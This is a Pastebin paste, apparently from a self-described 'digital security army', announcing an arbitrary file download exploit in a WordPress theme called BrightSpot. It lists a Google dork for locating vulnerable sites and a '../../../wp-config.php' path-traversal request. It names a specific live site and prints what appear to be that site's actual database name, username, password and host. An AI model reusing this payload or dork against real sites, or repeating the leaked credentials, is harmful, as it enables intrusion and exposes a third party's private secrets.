KingSkrupellos

WordPress 4.8 BrightSpot Themes Arbitrary File Download

Mar 18th, 2019
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.88 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : WordPress 4.8 BrightSpot Themes Arbitrary File Download
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/03/2019
  7. # Vendor Homepage : brightspotfundraising.co.uk ~ wordpress.org
  8. # Software Information Link : brightspotfundraising.co.uk/blog/
  9. # Software Affected Versions : 4.7/4.8
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/wp-content/themes/brightspot/"
  14. intext:Copyright 2019 © Bright Spot | Rob Woods
  15. # Vulnerability Type :
  16. CWE-200 [ Information Exposure ]
  17. CWE-23 [ Relative Path Traversal ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ############################################################################################
  23.  
  24. # Impact :
  25. ***********
  26. * WordPress 4.8 BrightSpot Themes is prone to a vulnerability that lets attackers download arbitrary files because the application
  27.  
  28. fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the
  29.  
  30. web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure
  31.  
  32. of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal
  33.  
  34. vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not
  35.  
  36. properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
  37.  
  38. ############################################################################################
  39.  
  40. # Vulnerable File :
  41. ******************
  42. /download.php
  43.  
  44. # Vulnerable Parameter :
  45. **********************
  46. ?download_file=
  47.  
  48. # Arbitrary File Download Exploit :
  49. *******************************
  50. /wp-content/themes/brightspot/download.php?download_file=[FILENAME]
  51.  
  52. /wp-content/themes/brightspot/download.php?download_file=../../../wp-config.php
  53.  
  54. # Information About MySQL Configuration File :
  55. ******************************************
  56. // ** MySQL settings - You can get this info from your web host ** //
  57. /** The name of the database for WordPress */
  58. define('DB_NAME', '');
  59.  
  60. /** MySQL database username */
  61. define('DB_USER', '');
  62.  
  63. /** MySQL database password */
  64. define('DB_PASSWORD', ');
  65.  
  66. /** MySQL hostname */
  67. define('DB_HOST', '');
  68.  
  69. /** Database Charset to use in creating database tables. */
  70. define('DB_CHARSET', '');
  71.  
  72. /** The Database Collate type. Don't change this if in doubt. */
  73. define('DB_COLLATE', '');
  74.  
  75. ############################################################################################
  76.  
  77. # Example Vulnerable Sites :
  78. *************************
  79. [+] brightspotfundraising.co.uk/wp-content/themes/brightspot/download.php?download_file=../../../wp-config.php
  80.  
  81. // ** MySQL settings - You can get this info from your web host ** //
  82. /** The name of the database for WordPress */
  83. define('DB_NAME', 'brightsp730_q9pm');
  84.  
  85. /** MySQL database username */
  86. define('DB_USER', 'brightsp730_q9pm');
  87.  
  88. /** MySQL database password */
  89. define('DB_PASSWORD', 'eroolwpp2st31zni');
  90.  
  91. /** MySQL hostname */
  92. define('DB_HOST', '10.169.0.164');
  93.  
  94. /** Database Charset to use in creating database tables. */
  95. define('DB_CHARSET', 'utf8');
  96.  
  97. /** The Database Collate type. Don't change this if in doubt. */
  98. define('DB_COLLATE', '');
  99.  
  100. ############################################################################################
  101.  
  102. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  103.  
  104. ############################################################################################
Add Comment
Please, Sign In to add comment